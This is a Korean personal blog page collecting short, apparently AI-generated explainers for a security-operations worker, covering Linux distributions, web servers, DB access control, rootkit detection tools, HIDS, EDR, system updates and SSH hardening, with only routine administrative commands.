이삭이의 토스트 공장

[보안_GPT] Debian이란?

isaacToast — Tue, 18 Nov 2025 15:28:07 +0900

**Debian(데비안)**은 가장 오래되고 안정적인 오픈소스 리눅스 배포판(Distribution) 중 하나로,
여러 리눅스들의 **“근본(원조)”**이라고 불릴 만큼 영향력이 큰 리눅스야.

특히 Ubuntu(우분투)는 Debian 기반으로 만들어졌고, 전 세계 많은 배포판들이 Debian을 토대로 나온 만큼 리눅스 생태계에서 매우 중요한 OS야.

Debian이란?

전적으로 커뮤니티(자원봉사자)가 개발·운영하는 오픈소스 리눅스 OS

1993년에 시작되어 30년 넘게 유지되고 있으며,
가장 믿을 수 있고 안정적인 리눅스 배포판 중 하나로 평가받아.

Debian의 주요 특징

1️⃣ 최고 수준의 안정성

서버용 리눅스 중에서도 가장 안정적이라고 평가
업데이트가 매우 신중하게 이뤄져서 기업 환경에서도 안정적

2️⃣ 커뮤니티 지향(기업 종속 X)

Red Hat처럼 기업 지원이 아닌
전 세계 오픈소스 기여자들이 만든 배포판
완전히 자유로운 오픈소스 정책 유지

3️⃣ Ubuntu의 기반

Ubuntu Desktop / Server는 Debian을 기반으로 제작
많은 패키지와 설정이 Debian 표준을 따름

4️⃣ APT 패키지 사용

패키지 관리 시스템: apt, dpkg
모든 패키지가 안정성 중심으로 검증됨

5️⃣ 보안 및 지속적 관리

Debian Security Team이 즉각적으로 보안 패치 제공
안정성과 보안 모두 강점

⭐ Debian의 장점

✔ 최고 안정성
✔ 자유 오픈소스(라이선스 순수)
✔ 가벼움 + 최소 구성 가능
✔ 수천 개의 패키지 지원
✔ 서버/IoT/임베디드 환경에 적합

⚠️ Debian의 단점

✘ 업데이트 느림
(안정성을 위해 검증 과정이 길어서 최신 기능은 늦게 적용됨)

✘ 초보자 친화성은 Ubuntu보다 떨어짐
(설치/기본 UI가 다소 투박함)

Debian은 어디에 쓰일까?

✔ 웹 서버 (Nginx/Apache)
✔ DB 서버 (MySQL, MariaDB, PostgreSQL)
✔ 클라우드 서버
✔ IoT/임베디드 리눅스 기기
✔ 보안 연구 실습 환경
✔ Docker 베이스 이미지
(많은 공식 Docker 이미지의 기반이 Debian 또는 Alpine임)

RHEL 계열과 비교하면?

구분DebianRHEL(Rocky/Alma 포함)

철학	완전 오픈소스 커뮤니티 중심	기업 중심 안정성 + 유료 지원
패키지	APT 기반	RPM 기반
업데이트	느리지만 안정적	정기적, 검증된 패치
안정성	매우 높음	매우 높음
비즈니스 사용	중소기업·개발 서버 중심	대기업·금융·공공

한 줄 요약

Debian = 안정성 최고, 오픈소스의 교과서 같은 리눅스
Ubuntu = Debian을 좀 더 쉽게 만든 버전

[보안_GPT] RHEL(Red Hat Enterprise Linux)란?

isaacToast — Tue, 18 Nov 2025 15:27:05 +0900

**Red Hat Enterprise Linux(RHEL)**은 기업용(엔터프라이즈) 상업 리눅스 운영체제로,
전 세계 대기업·금융·공공기관·IDC·클라우드 환경에서 가장 많이 사용하는 프리미엄 리눅스 OS야.

CentOS / Rocky / Alma가 RHEL과 “호환되는 무료 OS”라면,
RHEL은 그 원본이자 정식 상업 버전이야.

RHEL(Red Hat Enterprise Linux)란?

✔ 미국 Red Hat(레드햇)사가 만든 상용(유료) 리눅스 OS

기업 서버·데이터센터·보안 환경에서 사용
매우 안정적이고, 보안 패치가 빠르고, 공식 기술지원(Support)을 받을 수 있음
정부기관과 금융권에서 필수적으로 사용하는 경우가 많음

✔ CentOS가 무료 RHEL이었다면,

지금은 **RHEL → CentOS Stream(테스트용)**로 정책이 바뀌었고,
기업들은 대신 Rocky Linux / AlmaLinux를 사용하기 시작한 것.

RHEL의 핵심 특징

1️⃣ 엔터프라이즈 수준 안정성

수천 곳 기업에서 검증된 신뢰성
핵심 서비스(DB, ERP, WAS 등) 운영에 적합

2️⃣ 장기 지원(LTS)

버전 하나당 10년 이상의 지원기간
(보안 패치 + 성능 패치 지속)

3️⃣ Red Hat 공식 기술지원

장애 발생 시 레드햇 엔지니어가 직접 지원
SLA 수준에 따라 24/7 대응
보안 이슈도 신속하게 패치 제공

4️⃣ SELinux 기본 포함

강력한 접근 통제 보안 시스템(보안 담당자들이 자주 만짐)

5️⃣ RPM(YUM/DNF) 패키지 기반

Rocky·Alma·CentOS와 동일한 패키지 구조
서버 환경에서 매우 안정적

6️⃣ 보안 인증/규정에 적합

여러 국제 보안 인증(Common Criteria 등) 지원
금융권·공공기관 규정에서 RHEL 요구하는 곳도 있음

RHEL이 실제로 많이 쓰이는 곳

✔ 은행 · 카드사 · 보험사
✔ 공공기관 데이터센터
✔ 대기업 IDC 서버
✔ 제조/물류 ERP 서버
✔ 미션 크리티컬(중단되면 큰 손해 발생) 시스템
✔ Cloud 환경(AWS, Azure, GCP에도 RHEL 이미지 있음)

RHEL vs Rocky Linux vs AlmaLinux 비교

항목RHELRocky LinuxAlmaLinux

비용	유료(비쌈)	무료	무료
용도	금융/공공/대기업 핵심 시스템	기업 서버 · CentOS 후계	클라우드/컨테이너
안정성	최고	매우 높음	매우 높음
기술지원	Red Hat 직원이 직접	커뮤니티 중심	재단+커뮤니티
SELinux	기본	포함	포함
업데이트	가장 먼저	RHEL 따라감	RHEL 따라감

⭐ 보안 담당자 관점 핵심 요약

RHEL = 가장 안정적이고, 기업에서 돈 주고 사용하는 상업용 리눅스
때문에 정책·보안·패치·호환성·지원이 모두 최고 수준.

반대로:

회사가 비용 절감 → Rocky Linux
클라우드/개발 환경 중심 → AlmaLinux
금융/공공/핵심 시스템 → RHEL

[보안_GPT] CentOS / Rocky Linux / AlmaLinux 란?

isaacToast — Tue, 18 Nov 2025 15:26:00 +0900

CentOS / Rocky Linux / AlmaLinux는 모두 RHEL(Red Hat Enterprise Linux) 계열의 리눅스 배포판이야.
즉, 기업용 서버에 최적화된 리눅스들이고, 실제 회사 서버에서 가장 많이 쓰이는 계열이야.

아래에 왜 이렇게 세 종류가 생겼는지, 무엇이 다른지, 실무에서 언제 쓰는지 쉽게 정리해줄게.

1) CentOS란? (현재는 사실상 종료된 OS)

✔ RHEL 기반, 완전 무료 서버용 OS

원래 리눅스 서버 시장에서 점유율 1위
안정성·호환성·기업용 성능이 좋아서 전 세계에서 강세였던 리눅스

✔ 하지만 2021년에 Red Hat이 CentOS 지원 종료 발표

기존 CentOS → CentOS Stream(불안정한 테스트용)으로 바뀜
기업들은 “더 이상 CentOS는 안정적 서버 OS가 아니다!”라고 판단

그래서 기업들은 새로운 대체 OS를 찾아야만 했고, 그 결과로 Rocky Linux와 AlmaLinux가 등장한 거야.

2) Rocky Linux란? (CentOS의 진짜 후계자)

✔ CentOS 창립자가 만든 CentOS의 정통 후속 OS

CentOS 창시자인 Gregory Kurtzer가 직접 만듦
목표: “예전 CentOS처럼 안정적이고 완전한 RHEL과 100% 호환되는 무료 OS 만들자”

✔ 특징

RHEL과 바이너리 레벨 100% 호환 (서버 운영에 최적)
기업, 클라우드, IDC에서 빠르게 대세로 자리 잡음
안정성 중시 기업들이 많이 선택

지금 한국 기업들에서 가장 많이 쓰는 CentOS 대체 OS = Rocky Linux

3) AlmaLinux란? (또 다른 RHEL 호환 대체 OS)

✔ CloudLinux 회사가 후원하여 개발한 RHEL 호환 OS

CentOS 종료 이후 만들어진 대체 OS
Rocky Linux와 마찬가지로 RHEL과 호환성 100%

✔ 특징

중립적인 비영리재단에서 관리 (기업 종속 없음)
클라우드(AWS, GCP)에서 이미지 지원이 빠름
Rocky보다 조금 더 업데이트가 빠르고 적극적

클라우드 기반, 컨테이너 인프라에서 AlmaLinux도 많이 선택됨

비교 요약표

항목CentOSRocky LinuxAlmaLinux

현재 상태	사실상 종료	CentOS 후계자	RHEL 호환 대체 OS
안정성	낮음(테스트용)	매우 높음	매우 높음
업데이트 속도	빠름(테스트 중심)	안정성 중심	약간 빠름
만든 곳	Red Hat	CentOS 창립자	CloudLinux 후원
기업 서버 적합성	X	◎	◎
커뮤니티/트렌드	낮아짐	매우 활발	활발

⭐ 어떤 걸 쓰는 게 좋을까?

보안/인프라 담당자 입장에서 추천하면:

기업용 서버 → Rocky Linux

CentOS의 정통 후계자
안정성·호환성·생태계 최고

클라우드 서버 → AlmaLinux

클라우드 이미지 지원 빠름
업데이트 속도가 적당히 빠르고 개발 친화적

실무에서는 이렇게 구분됨

웹 서버 / WAS / DB / IDC 서버 운영 → Rocky Linux
Docker / Kubernetes / 클라우드 EC2 → AlmaLinux
예전 CentOS 사용 서버 → 대부분 Rocky/Alma로 마이그레이션 중

[보안_GPT] Ubuntu란?

isaacToast — Tue, 18 Nov 2025 15:24:40 +0900

**Ubuntu(우분투)**는 전 세계에서 가장 널리 사용되는 리눅스 배포판(Distribution) 중 하나야.
초보자부터 개발자·서버 관리자까지 모두 사용하는 사용하기 쉬운 리눅스 운영체제라고 보면 돼.

✅ Ubuntu란?

Debian 리눅스 기반으로 만들어진 오픈소스 운영체제
영국 회사 **Canonical(캐노니컬)**에서 개발·관리하고 있어.

우분투는 다른 리눅스 배포판보다 설치·사용이 쉽고, 커뮤니티 자료도 많아서 처음 리눅스를 접하는 사람들에게 가장 인기 있어.

Ubuntu의 특징

1) 사용자 친화적

GUI(그래픽 인터페이스)가 잘 되어 있어 윈도우처럼 사용 가능
초보자도 쓰기 쉬움

2) 패키지 설치가 쉬움

apt 패키지 관리 시스템 사용
예: sudo apt install nginx

3) 서버/개발 환경에서 최강

클라우드(AWS·GCP·Azure)에서 가장 많이 선택됨
Docker·Kubernetes 환경에서도 표준처럼 쓰임

4) 안정적이고 보안 패치가 빠름

LTS(Long Term Support) 버전은 5년 지원
보안 업데이트가 매우 빨리 제공됨

5) 무료 + 기업 지원

무료로 사용 가능
필요하면 Canonical에서 유료 기술 지원도 받을 수 있음

Ubuntu는 어디에 쓰일까?

✔ 웹 서버 (Nginx, Apache)
✔ DB 서버 (MySQL, MariaDB, MongoDB)
✔ CI/CD 서버 (Jenkins, GitLab)
✔ 클라우드 인스턴스
✔ 개발용 PC
✔ 보안 장비 기반 OS

너처럼 인프라/보안 담당자 입장에서는 특히:

로그 분석
권한 설정
방화벽(UFW/IPTables)
시스템 점검
서비스 감시(systemctl)

이런 작업을 Ubuntu에서 자주 하게 돼.

Ubuntu의 종류

✔ Ubuntu Desktop — PC용

✔ Ubuntu Server — GUI 없음, 서버용

✔ Ubuntu Cloud 이미지 — AWS, GCP, Azure에서 제공

✔ Ubuntu Core — IoT / 경량 임베디드용

[보안_GPT] 리눅스(Linux)란?

isaacToast — Tue, 18 Nov 2025 15:22:42 +0900

**리눅스(Linux)**는 **오픈소스 기반의 운영체제(OS)**로, 서버·클라우드·보안·개발 환경에서 가장 널리 사용되는 시스템이야. 간단히 말하면 컴퓨터를 켜고 프로그램이 동작하도록 만들어주는 핵심 시스템이라고 보면 돼.

리눅스(Linux)란?

리눅스는 1991년 **리누스 토르발스(Linus Torvalds)**가 처음 만든 운영체제 커널에서 시작되었고, 이후 전 세계 개발자들이 함께 발전시킨 오픈소스 운영체제야.

리눅스 = 커널(Linux Kernel) + GNU 도구 + 다양한 패키지 → 완성된 운영체제

✅ 리눅스의 주요 특징

1) 오픈소스

누구나 코드 수정 및 배포 가능
무료로 사용 가능 (기업용 지원 포함)

2) 안정성과 보안성

서버 환경에서 가장 선호
권한 구조가 명확하고, 바이러스·악성코드에 비교적 강함

3) 멀티유저 / 멀티태스킹

여러 사용자가 동시에 접속해도 안정적으로 동작
다양한 작업을 동시에 수행 가능

4) 가벼움 & 성능 좋음

Windows보다 자원 소모가 적어 서버 운영에 최적

5) 명령어 기반(CLI) 중심

GUI도 있지만, 대부분 **터미널(SSH)**로 관리

리눅스가 사용되는 곳

✔ 서버 (웹 서버, DB 서버, 게임 서버 등)

✔ 클라우드 인프라 (AWS, GCP, Azure 대부분 리눅스)

✔ 보안시스템(WAF, IDS/IPS, SIEM 등 OS가 리눅스 기반)

✔ 네트워크 장비(OS가 리눅스 기반)

✔ 개발 환경(Docker, Kubernetes, GitLab, Jenkins)

주요 리눅스 배포판 종류

Ubuntu – 사용자 친화적, 개발·테스트 환경에서 인기
CentOS / Rocky Linux / AlmaLinux – 기업 서버, 웹 서비스에서 가장 많이 사용
Red Hat Enterprise Linux(RHEL) – 엔터프라이즈 기업용
Debian – 안정성 최고
Kali Linux – 보안·취약점 분석용

보안 담당자 관점에서 리눅스

너가 인프라/보안 관제 업무 하는 걸 알고 있어서, 실무 기준으로 정리하면:

✓ 리눅스는 로그 분석, 패키지 업데이트, 서비스 점검, 계정 관리, 방화벽 설정, 권한 관리, 취약점 점검 등 모든 서버 보안의 기본이야.
✓ WAF, IPS, EDR, 보안 장비들도 내부는 대부분 리눅스 기반 OS로 돌아감.

즉, 보안 담당자에게 리눅스는 기본 언어 같은 존재야.

[보안_GPT] DB 접근제어란?

isaacToast — Mon, 17 Nov 2025 14:32:15 +0900

DB 접근제어(Database Access Control)란 데이터베이스(DB)에 누가, 무엇을, 어떻게 접근할 수 있는지를 통제하는 보안 기술과 정책을 말해.
쉽게 말해, 중요한 데이터가 저장된 DB를 아무나 들여다보거나 수정하지 못하도록 막는 것이야.

✅ DB 접근제어의 핵심 개념

1) 인증(Authentication)

DB에 접속하려는 사용자가 누구인지 확인
예: ID/비밀번호, MFA, 계정 기반 인증

2) 인가(Authorization)

사용자가 어떤 행위를 해도 되는지 권한을 부여

SELECT(조회)
INSERT(추가)
UPDATE(수정)
DELETE(삭제)
DBA 권한(관리자)

SQL 예시:

GRANT SELECT, INSERT ON users TO app_user;

3) 접근 통제 정책

보통 크게 3가지 모델을 사용함:

모델설명

DAC(임의 접근제어)	소유자가 권한을 결정 (일반 DB에서 많이 사용)
MAC(강제 접근제어)	보안 등급 기반 통제 (군/정부 등)
RBAC(역할 기반 접근제어)	역할(role)에 따라 권한 부여 (기업 DB 대부분 사용)

✅ DB 접근제어가 필요한 이유

고객 정보 유출 방지
내부자에 의한 데이터 오·남용 방지
ISMS-P 등 규제 준수 필수
DB 전체가 해킹되는 것을 방지

✅ DB 접근제어 솔루션(DB 접근제어 시스템)

기업에서는 DB 자체 기능 외에도 별도 솔루션을 씀:

✦ 주요 기능

SQL 명령어 감시/차단
관리자(개발자/DBA) 접속 통제
DB 계정 공유 방지
계정/세션 기록
실시간 이상행위 탐지
감사 로그 저장

✦ 동작 방식 (대표적인 방식)

프록시 방식
- DB 앞에 Proxy 서버를 두어 모든 SQL을 감시
에이전트 방식
- DB 서버 내부에 Agent 설치
네트워크 패킷 분석 방식
- DB로 들어가는 패킷을 분석하여 SQL 확인

⚠️ 보안관제 관점에서 DB 접근제어 포인트

보안 담당자라면 이런 걸 체크해야 해:

• DBA 계정 접속 시간/출처
• 평소와 다른 SQL 실행 여부
• 대량 조회(SELECT * FROM …) 탐지
• 백업 파일 무단 생성/다운로드
• 신규 계정 생성 감시
• 직접 DB 접속 대신 중간 솔루션 경유 여부 확인

한 문장 요약

DB 접근제어란 DB에 대한 사용자 접근을 인증·권한·정책·감사 측면에서 통제하여 중요 정보를 보호하는 보안 기술이다.

[보안_GPT] Apache / Tomcat / Nginx란?

isaacToast — Mon, 17 Nov 2025 14:30:15 +0900

Apache / Tomcat / Nginx 한눈에 비교

구분ApacheNginxTomcat

종류	웹 서버(Web Server)	웹 서버 + 리버스 프록시	웹 애플리케이션 서버(WAS)
주 사용 목적	정적 페이지 제공	정적 페이지 + 리버스 프록시 + 고성능	Java 기반 애플리케이션 실행
처리 방식	프로세스 기반	이벤트 기반	Java Servlet/JSP 실행
속도	보통	매우 빠름	느린 편(역할 다름)
용도	웹 페이지 서비스	고성능/대규모 트래픽 처리	Java 웹 서비스 실행

1) Apache(아파치)란?

정의:
Apache HTTP Server는 가장 오래되고 널리 사용되는 웹 서버야.

특징

정적 콘텐츠(HTML, 이미지 등)를 제공
모듈 방식으로 기능을 확장 (mod_security, mod_rewrite 등)
프로세스 기반 방식이라 동시 접속이 많으면 성능이 떨어질 수 있음

장점

안정적이고 오랫동안 검증됨
기능과 설정이 매우 다양
PHP 웹사이트와 잘 어울림

단점

대규모 트래픽 처리 시 Nginx보다 느림
자원 사용량이 상대적으로 높음

2) Nginx(엔진엑스)란?

정의:
Nginx는 고성능 웹 서버 + 리버스 프록시 서버로 유명한 서버 프로그램이야.

특징

이벤트 기반 처리 → 매우 빠르고 트래픽 처리량 높음
정적 파일 처리 최강
리버스 프록시로 많이 사용
(예: 앞단에 Nginx, 뒤에 Tomcat 여러 개)

주 사용 용도

대용량 트래픽 웹사이트 (넷플릭스, 깃허브 등)
로드밸런싱
SSL 종료(HTTPS 처리)
캐싱 서버 기능

장점

성능 최고
적은 자원으로 많은 요청 처리
최신 아키텍처에 최적화

단점

Apache보다 설정이 어렵다고 느끼는 사람도 있음

3) Tomcat(톰캣)란?

정의:
Tomcat은 **Java 웹 애플리케이션을 실행하기 위한 WAS(Web Application Server)**야.
웹 서버가 아니라, 서버 사이드 Java 코드를 실행하는 서버.

역할

Java Servlet 실행
JSP(Java Server Page) 처리
Spring Boot 등 Java 기반 웹 서비스 실행

사용 용도

금융권, 공공기관 등 Java 기반 웹 서비스
Spring Framework 기반 애플리케이션

장점

Java 웹 애플리케이션 실행 필수
안정적인 WAS
Spring Boot의 내장 톰캣처럼 개발 표준

단점

정적 파일 처리 성능은 웹 서버보다 떨어짐
대규모 트래픽 처리 능력은 Nginx에 미치지 못함

실제 운영 환경에서는 이렇게 사용됨

정석 구성

[Nginx] → [Tomcat] → Database

클라이언트 요청은 Nginx가 받음
정적 파일은 Nginx가 바로 처리
Java 요청은 Tomcat으로 넘김 (리버스 프록시 역할)
Tomcat은 Java application 처리
Apache도 비슷한 구성 가능하지만 최신 트래픽 환경에서는 Nginx가 선호됨

한 문장 요약

Apache: 오래되고 안정적인 웹 서버
Nginx: 고성능 웹 서버 + 리버스 프록시 (최신 트래픽 환경의 표준)
Tomcat: Java 웹 애플리케이션 실행하는 WAS

[보안_GPT] Rootkit 감지 도구란?

isaacToast — Mon, 17 Nov 2025 14:28:04 +0900

rootkit 감지 도구는 시스템 안에 숨겨져 있는 루트킷(rootkit) 악성코드를 탐지하고 제거하기 위해 사용되는 보안 도구야.

루트킷(rootkit)은
→ 자신을 숨기고,
→ 시스템 권한을 조작하며,
→ 보안 도구에서 보이지 않도록 활동을 은폐하는 악성코드라서
일반 백신이나 OS 기본 기능만으로는 잘 보이지 않아.

그래서 **전문 rootkit 탐지 도구(anti-rootkit)**가 필요해.

1. Rootkit 감지 도구란?

루트킷이 숨겨놓은 파일, 프로세스, 네트워크 포트, 커널 훼손 여부 등을 탐지하는 전문 보안 도구
→ 커널 무결성 검사
→ 시스템 호출 변조 확인
→ 숨겨진 파일/프로세스 탐지
→ 권한 상승 흔적 분석

루트킷은 시스템 깊숙한 영역에 숨어서 OS 정보를 조작하기 때문에
이런 도구들이 OS 외부 시각, 로우레벨 방식으로 탐지하는 경우가 많아.

2. 대표 Rootkit 감지 도구

아래는 실제로 널리 쓰이는 루트킷 탐지 도구들이야.

✅ 1) chkrootkit (Linux)

가장 유명한 루트킷 탐지 도구
다양한 루트킷 signature 기반 탐지
빠르게 검사 가능
커맨드라인 기반

예:

sudo chkrootkit

✅ 2) rkhunter (Rootkit Hunter, Linux)

루트킷, 백도어, 의심스러운 파일 권한 등을 검사
무결성 검사(sha256 해시 기반) 기능 포함

예:

sudo rkhunter --check

✅ 3) Lynis (보안 감사 + rootkit 탐지)

전체 시스템 보안 점검 도구
rootkit 포함 다양한 취약점 탐지
서버 보안 점검에 많이 사용됨

✅ 4) OSSEC (HIDS)

HIDS이지만 rootkit detection 모듈 포함
로그 분석 + 파일 무결성 검사 + rootkit 탐지도 같이 수행

✅ 5) Windows 전용 Anti-rootkit 도구

▶ Microsoft MRT(Malicious Software Removal Tool)

기본 제공
일부 루트킷 탐지 및 제거 가능

▶ GMER

Windows에서 가장 강력한 루트킷 탐지 도구
숨겨진 프로세스, 서비스, 레지스트리, 드라이버 탐지
포렌식 전문가들이 사용

▶ Kaspersky TDSSKiller

부트킷, 커널 루트킷 탐지에 특화
유명한 TDSS/Tdl4 계열 루트킷 제거 가능

3. Rootkit 탐지 방식

rootkit 탐지 도구는 보통 아래 방식을 사용해:

1️⃣ 시스템 호출 테이블(Syscall Table) 비교

루트킷은 커널 함수 후킹을 많이 함 → 변경 여부 탐지

2️⃣ File & Directory 무결성 검사

중요 파일의 hash 값 비교
예: /bin/ls, /bin/ps 등이 변조됐는지 확인

3️⃣ 숨겨진 프로세스 탐지

/proc에 표시되지 않는 프로세스 존재 여부 확인

4️⃣ 커널 모듈(Kernel Module) 검사

lsmod에 보이지 않지만 실제 존재하는 모듈 탐지

5️⃣ 네트워크 포트/연결 검사

숨겨진 포트나 백도어 연결 탐지

4. Rootkit 감지의 특징

발견이 어렵고 고도화된 악성코드라 일반 백신보다 더 전문적인 탐지 필요
커널 레벨에서 활동하므로 OS가 조작될 수 있음
감지가 되면 즉시 조치 필요(시스템 재설치 권장되는 경우도 있음)

한 문장 요약

Rootkit 감지 도구 = OS와 보안 프로그램을 속이기 위해 숨겨진 루트킷을 찾아내기 위해 커널, 파일, 프로세스, 네트워크 등을 Low-level로 검사하는 전문 보안 도구

[보안_GPT] HIDS(Host-based Intrusion Detection System)란?

isaacToast — Mon, 17 Nov 2025 14:18:37 +0900

1. HIDS란?

정의:
HIDS(Host-based Intrusion Detection System)는 개별 호스트(서버, 컴퓨터 등)에서 발생하는 악성 행위나 비정상적인 활동을 탐지하는 보안 시스템이야.

즉:

“개별 장치에서 발생하는 침입, 해킹 시도를 실시간으로 감지하고 경고하는 시스템”

네트워크에서 발생하는 공격을 감지하는 **NIDS(Network-based IDS)**와 달리, 호스트 내의 활동을 직접 모니터링

2. HIDS의 주요 기능

1️⃣ 시스템 로그 모니터링

시스템에서 발생하는 로그 파일을 실시간으로 모니터링
예: /var/log/auth.log, 이벤트 로그 등

2️⃣ 파일 무결성 검사

중요한 시스템 파일의 변경 여부를 추적
악성코드나 비정상적인 파일 변조 탐지

3️⃣ 프로세스 모니터링

실행 중인 프로세스를 감시하고 의심스러운 활동을 탐지
예: rootkit, 불법 프로그램 실행

4️⃣ 침입 탐지

시스템 내에서 비정상적인 접근 시도나 해킹을 실시간으로 탐지

5️⃣ 경고 및 알림

의심스러운 활동이 발생하면 관리자에게 즉시 경고 메시지나 이메일을 발송

3. HIDS와 NIDS 차이

구분HIDSNIDS

탐지 대상	호스트 내의 활동(파일, 프로세스 등)	네트워크 내의 트래픽
배치 위치	서버나 클라이언트 장치에 설치	네트워크 경계에 설치 (예: 라우터, 스위치)
장점	호스트 내부에서 발생하는 공격 탐지 가능	네트워크 전반의 공격을 탐지
단점	각 호스트에 별도로 설치 필요, 리소스 소비	암호화된 트래픽, 내부 네트워크 트래픽 탐지 어려움

4. HIDS 사용 사례

서버 보안: 특정 서버에서 발생하는 비정상적인 로그인 시도, 파일 변경 등 감지
개인 PC 보안: PC에서 발생하는 의심스러운 프로그램 실행 감지
데이터 유출 탐지: 중요한 파일의 무단 접근이나 외부로의 전송 감지
보안 규제 준수: PCI DSS, HIPAA와 같은 규제를 준수하기 위한 로그 모니터링

5. HIDS의 장점과 단점

장점단점

실시간 모니터링: 장치 내 활동을 실시간으로 감시 가능	리소스 소비: 시스템 자원을 일부 사용
세밀한 탐지: 파일, 프로세스, 시스템 이벤트 등을 세밀하게 모니터링	설정 및 관리 복잡: 많은 호스트를 관리해야 함
내부 공격 탐지: 외부 네트워크 공격뿐만 아니라 내부 공격도 탐지 가능	네트워크 공격 탐지 불가: 네트워크 전체를 모니터링하지 않음

한 문장 요약

HIDS = 개별 호스트에서 발생하는 침입, 해킹 시도, 비정상적인 활동을 탐지하여 경고하는 보안 시스템으로, 시스템 파일, 프로세스, 로그 등을 실시간으로 모니터링한다.

[보안_GPT] EDR (Endpoint Detection and Response)란?

isaacToast — Mon, 17 Nov 2025 14:17:00 +0900

1. EDR (Endpoint Detection and Response)란?

정의:
EDR은 엔드포인트(PC, 서버, 모바일 장치 등)의 보안을 실시간으로 모니터링하고, 의심스러운 활동을 탐지하여 대응하는 보안 솔루션이야.

즉:

"엔드포인트 장치에서 발생할 수 있는 보안 위협을 실시간으로 탐지하고, 공격을 차단하거나 추적할 수 있도록 도와주는 시스템"

2. EDR의 주요 기능

1️⃣ 실시간 모니터링

엔드포인트에서 발생하는 모든 활동을 실시간으로 감시

2️⃣ 위협 탐지

비정상적인 행위나 공격 패턴을 감지 (예: 악성코드 실행, 권한 상승)

3️⃣ 자동 대응(AI 기반)

의심스러운 활동에 대한 자동 차단 및 격리

4️⃣ 위협 분석 및 포렌식

침해 사고 발생 시 원인 분석, 로그 기록을 기반으로 사건을 재구성

5️⃣ 경고 및 리포트

보안 이벤트 발생 시 경고 및 상세 리포트 제공

3. EDR과 백신의 차이

구분EDR백신

목표	엔드포인트 전반의 위협 탐지 및 대응	주로 바이러스 및 악성코드 탐지
실시간 모니터링	가능 (지속적 감시)	일부 가능 (주로 수동 스캔)
반응 기능	자동 차단, 격리, 포렌식 제공	주로 치료 및 삭제
위협 분석	공격 경로 분석, 추적	악성코드 정의 기반 탐지
대상	고도화된 공격, 멀웨어, 해킹	바이러스, 트로이목마, 스파이웨어 등

2. 백신 (Antivirus)란?

정의:
백신은 컴퓨터에 침입하는 악성코드(바이러스, 트로이목마, 웜 등)를 탐지하고 제거하는 보안 프로그램이야.

즉:

"컴퓨터나 서버에 들어오는 악성코드를 탐지하고 치료하는 프로그램으로, 주로 정해진 패턴을 기반으로 검사"

3. 백신의 주요 기능

1️⃣ 악성코드 탐지

기존 악성코드 시그니처(Signature)를 기반으로 악성코드 식별

2️⃣ 실시간 감시

시스템에 설치된 악성코드가 실행되거나 침입하려 할 때 실시간으로 탐지

3️⃣ 주기적 스캔

사용자가 설정한 주기에 따라 파일 시스템을 스캔하고 악성코드를 제거

4️⃣ 격리 및 삭제

발견된 악성코드를 격리하거나 삭제하여 시스템을 보호

5️⃣ 백신 업데이트

최신 바이러스 패턴을 반영한 정기적인 업데이트

4. EDR과 백신의 비교

구분EDR백신

탐지 방식	행동 기반, AI, 머신러닝	시그니처 기반 (정해진 패턴)
주요 목적	고도화된 공격 및 내부 위협 대응	주로 기존 악성코드 탐지 및 제거
주요 기능	실시간 모니터링, 자동 대응, 사고 분석	악성코드 탐지, 스캔, 삭제
배포 대상	엔드포인트(PC, 서버, 모바일 등)	엔드포인트 및 클라우드 서비스
비용	상대적으로 고가 (기업 환경)	비교적 저렴 (개인 및 소규모 기업)

한 문장 요약

EDR = 엔드포인트에서 발생할 수 있는 고도화된 위협을 실시간으로 탐지하고 대응하는 보안 솔루션
백신 = 주로 바이러스와 악성코드를 탐지하고 제거하는 보안 프로그램

[보안_GPT] Linux 커널/패키지 업데이트란?

isaacToast — Fri, 14 Nov 2025 14:38:44 +0900

1. Linux 커널/패키지 업데이트란?

정의:
Linux 커널/패키지 업데이트는 운영체제의 핵심 구성 요소(커널)와 설치된 소프트웨어 패키지를 최신 버전으로 갱신하는 작업을 말해.

커널(Kernel): OS의 핵심, 하드웨어와 소프트웨어를 연결
패키지(Package): OS에 설치된 프로그램, 라이브러리, 서비스
보안 취약점, 버그 수정, 성능 개선 목적

즉:

“Linux 시스템을 최신 상태로 유지해 보안 취약점과 버그를 최소화하는 작업”

2. 커널 업데이트(Kernel Update)

OS 핵심인 커널 버전을 최신으로 갱신
보안 패치: 취약점(CVE) 수정
성능/하드웨어 지원 개선: 최신 드라이버, 기능 추가
주의점: 재부팅 필요, 호환성 문제 가능

예시 명령어 (Ubuntu/Debian)

sudo apt update sudo apt upgrade linux-image-generic sudo reboot

3. 패키지 업데이트(Package Update)

시스템에 설치된 모든 프로그램과 라이브러리 최신 버전 적용
보안 패치, 기능 개선, 버그 수정 포함
OS 안정성 및 보안 향상

예시 명령어 (Ubuntu/Debian)

sudo apt update # 패키지 목록 갱신 sudo apt upgrade # 설치된 패키지 업그레이드 sudo apt full-upgrade # 필요 시 의존성 패키지까지 업그레이드

예시 명령어 (RHEL/CentOS)

sudo yum update # 설치된 패키지 최신화 sudo yum upgrade # 시스템 전체 업그레이드

4. 업데이트 중요성

1️⃣ 보안 강화

취약점 공격 예방(CVE 패치)
악성코드/랜섬웨어 대응

2️⃣ 성능 및 안정성 향상

버그 수정, 시스템 안정성 개선

3️⃣ 호환성 확보

최신 하드웨어, 라이브러리 지원

4️⃣ 규제/컴플라이언스 준수

ISMS-P, ISO 27001 등 보안 규제 준수 필수

5. 업데이트 시 주의사항

업데이트 전 백업 필수
커널 업데이트 후 재부팅 필요
중요 서버는 점검 후 적용 권장
자동 업데이트(Auto Update) 설정 가능, 하지만 테스트 환경 필요

한 문장 요약

Linux 커널/패키지 업데이트 = OS 핵심 구성 요소와 설치된 소프트웨어를 최신 상태로 유지하여 보안 취약점, 버그, 성능 문제를 해결하고 시스템 안정성을 확보하는 작업

[보안_GPT] SSH란?

isaacToast — Fri, 14 Nov 2025 14:36:46 +0900

1. SSH란?

정의:
SSH(Secure Shell)는 네트워크를 통해 원격 서버에 안전하게 접속하고 명령을 실행할 수 있게 해주는 프로토콜이야.

암호화 통신을 제공 → 패킷 스니핑 방지
주로 리눅스/유닉스 서버 원격 관리에 사용
기본 포트: 22

2. SSH 보안의 중요성

서버 관리자 계정(root, sudo) 접근 통로
공격자가 SSH를 통해 시스템 제어 가능
무차별 대입(Brute Force), Credential Stuffing, 악성코드 유포 경로로 활용될 수 있음

즉, SSH 보안은 원격 접속 통신을 안전하게 지키는 것이 핵심임

3. SSH 보안 강화 방법

1️⃣ 포트 변경

기본 포트 22 → 다른 번호 사용 (스캐닝 공격 감소)

2️⃣ 강력한 인증 방식 적용

비밀번호 대신 SSH 키 기반 인증(Public Key Authentication) 사용
